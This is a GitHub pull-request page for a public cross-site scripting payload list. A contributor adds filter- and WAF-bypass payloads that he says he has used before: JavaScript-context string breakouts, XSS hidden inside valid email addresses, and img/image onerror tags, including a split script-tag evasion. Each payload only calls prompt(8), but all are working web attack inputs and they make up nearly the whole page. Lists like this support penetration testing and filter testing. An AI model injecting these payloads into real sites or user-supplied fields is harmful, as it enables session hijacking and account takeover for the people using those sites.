payloadbox / xss-payload-list

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
https://ismailtasdelen.medium.com
MIT License
6.26k stars 1.67k forks source link

Added some WAF/filter bypass payloads #17

Closed Xib3rR4dAr closed 3 years ago

Xib3rR4dAr commented 3 years ago

Added some crafted payloads that I previously used to bypass WAF/filters.

JS context

"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"

Valid emails

"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y

Others

<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>